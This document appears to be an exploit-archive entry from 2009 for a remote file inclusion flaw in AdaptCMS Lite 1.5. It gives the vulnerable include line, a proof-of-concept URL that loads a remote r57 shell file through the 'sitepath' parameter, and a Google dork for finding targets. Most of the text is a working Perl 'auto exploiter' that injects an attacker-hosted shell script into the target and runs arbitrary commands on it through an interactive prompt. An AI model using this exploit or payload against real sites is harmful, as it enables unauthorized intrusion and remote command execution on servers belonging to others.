[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : AdaptCMS Lite 1.5 Remote File Inclusion Vulnerability
# Published : 2009-11-29
# Author : v3n0m
# Previous Title : Sugar CRM 5.5.0.RC2 and 5.2.0j Multiple Remote Vulnerabilities
# Next Title : Joomla Component com_lyftenbloggie 1.04 Remote SQL Injection Vulnerability
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( ) )) ) ) )) ) ) ) ( /( ( /(
)())())) ) )()) ) ) ) (()/(()/( ( (()/(()/((()/( )()) )())
((_)((_)(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) ) /(_))(_))/(_))(_)|((_)
__ ((_)((_)/(_))___ ((_) _ ) )___) _ )(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
/ / _ (_)) __ / (_)_(_)(/ __(_)_(_) _ | | __| _ | |_ _|| | | |/ /
V / (_) || (_ | V / / _ | (__ / _ | /| |) | _|| / |__ | | | .` | ' <
|_| ___/ ___| |_| /_/ _ ___/_/ _|_|_|___/|___|_|_____|___||_|_|_|_
[+] AdaptCMS Lite 1.5 Remote File Inclusion Vulnerability
[-] Author : v3n0m
[-] Contact : v3n0m666[at]live[dot]com
[-] Blog : http://v3n0m.blogdetik.com/
[-] Group : YOGYACARDERLINK
[-] Site : http://yogyacarderlink.web.id/
[-] Date : November, 26-2009 [INDONESIA]
[!] Application : AdaptCMS Lite
[!] Vendor : www.insanevisions.com
[!] Version : 1.5 Other versions may also be affected
[!] Download : http://sourceforge.net/projects/adaptcms/files/
[!] License : Free
[!] Vulnerable : Remote File Inclusion
[!] Google Dork : Copyright 2006-2009 Insane Visions
[o] Description
AdaptCMS is a PHP CMS that is made for complete control of your website,
easiness of use and easily adaptable to any type of website.
It's made easy with advanced custom fields,
a very simple but powerful template system and much more.
Vuln Code & PoC
***************
Vuln: include_once($sitepath."includes/rss/simplepie.inc");
PoC : http://server/plugins/rss_importer_functions.php?sitepath=http://localhost/r57.txt??
AdaptCMS Lite Auto Exploiter
****************************
#!/usr/bin/perl -w
##################################################################
# Created by v3n0m #
# sHoutz: lingah,IdioT_InsidE,LeQhi,aRiee,z0mb13,m4rco,NaZmy, #
# eidelweiss,JaLi-,Anak_Naga_,g0nz,mywisdom,setanmuda, #
# yoga0400,ripper_maya,elv1n4,badkiddies,dhit_coxon, #
# psychotic_girl,jo8928,r4f43l_world,angela zhang #
# & All YOGYACARDERLINK Crew #
# #
# - register_globals = on #
# - allow_url_include = on #
# - allow_url_fopen = on #
##################################################################
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
use Getopt::Long;
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
}
&clear();
sub banner {
&clear();
print "|---------------------------------------------|n";
print "| AdaptCMS Lite RFI Auto Injector |n";
print "| Created : v3n0m |n";
print "| E-mail : v3n0m666[at]live[dot]com |n";
print "| |n";
print "| |n";
print "| www.yogyacarderlink.web.id |n";
print "|---------------------------------------------|nn";
print "Usage:n";
print " perl $0 -u "http://target/[path]/" -fuck "http://localhost/r57.txt??"nn";
exit();
}
my $options = GetOptions (
'help!' => $help,
'u=s' => $u,
'fuck=s' => $fuck
);
&banner unless ($u);
&banner unless ($fuck);
chomp($u);
chomp($fuck);
while (){
print "[shell]:~$ ";
chomp($cmd=<STDIN>);
if ($cmd eq "exit" || $cmd eq "quit") {
exit 0;
}
my $ua = LWP::UserAgent->new;
$iny="?&act=cmd&cmd=" . $cmd . "&d=/&submit=1&cmd_txt=1";
chomp($iny);
my $own = $u . "/plugins/rss_importer_functions.php?sitepath=" . $fuck . $iny;
chomp($own);
my $req = HTTP::Request->new(GET => $own);
my $res = $ua->request($req);
my $con = $res->content;
if ($res->is_success){
print $1,"n" if ( $con =~ m/readonly> (.*?)</textarea>/mosix);
}
else
{
print "Exploiting failed !!n";
exit(1);
}
}